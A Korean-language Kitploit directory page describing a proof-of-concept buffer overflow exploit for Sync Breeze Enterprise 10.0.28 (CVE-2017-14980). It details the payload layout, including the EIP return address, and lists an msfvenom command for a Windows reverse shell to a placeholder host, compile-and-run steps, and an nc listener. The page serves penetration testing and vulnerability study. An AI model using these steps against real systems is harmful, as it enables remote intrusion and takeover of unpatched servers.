Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — 개념 증명 버퍼 오버플로 익스플로잇 for Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). 조작된 HTTP POST 페이로드를 전송하여 EIP를 덮어쓰고 사용자 정의 x86 셸코드를 실행하여 임의 코드 실행을 수행합니다. | Kitploit
도구/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingBinary Exploitation
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-14980_syncbreeze_10.0.28_bof

개념 증명 버퍼 오버플로 익스플로잇 for Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). 조작된 HTTP POST 페이로드를 전송하여 EIP를 덮어쓰고 사용자 정의 x86 셸코드를 실행하여 임의 코드 실행을 수행합니다.

저장소 보기
231년 전아직 검토되지 않음

익스플로잇 - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

이 저장소는 CVE-2017-14980으로 식별된 취약점을 대상으로 Sync Breeze Enterprise 버전 10.0.28에 대한 개념 증명 **버퍼 오버플로우 익스플로잇(BOF)**을 포함합니다.

설명

이 취약점은 /login 엔드포인트에 대한 POST 요청에서 password 필드를 처리할 때 부적절한 입력 검증으로 인해 존재합니다.
공격자는 이 필드에 지나치게 긴 값을 보내 EIP를 덮어쓰고 임의 코드 실행을 가능하게 할 수 있습니다.

이 익스플로잇은 다음으로 구성된 신중하게 조작된 페이로드를 전송합니다:

  • 520바이트의 채우기('A')
  • EIP를 덮어쓰기 위한 4바이트
  • 20바이트의 NOP sled
  • 임의 명령을 실행하도록 사용자 정의할 수 있는 Windows x86 셸코드

작동 방식

  1. 익스플로잇은 포함된 셸코드를 포함한 악의적인 버퍼를 구성합니다.
  2. 취약한 서버에 password 필드에 페이로드를 포함한 HTTP POST 요청을 전송합니다.
  3. 요청을 처리하는 동안 애플리케이션은 명령 포인터(EIP)를 덮어쓰고 공격자가 제공한 셸코드를 실행합니다.

요구 사항

  • C 컴파일러 (예: gcc)
  • Sync Breeze Enterprise 10.0.28을 실행 중인 대상에 대한 네트워크 접근
  • 필요한 경우 EIP 주소(\x83\x0C\x09\x10) 및 셸코드 조정

msfvenom을 사용한 셸코드 생성 예시:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
root@kitploit:~
gcc exploit.c -o exploit
./exploit

root@kitploit:~
nc -nlvp 4444
도구 다운로드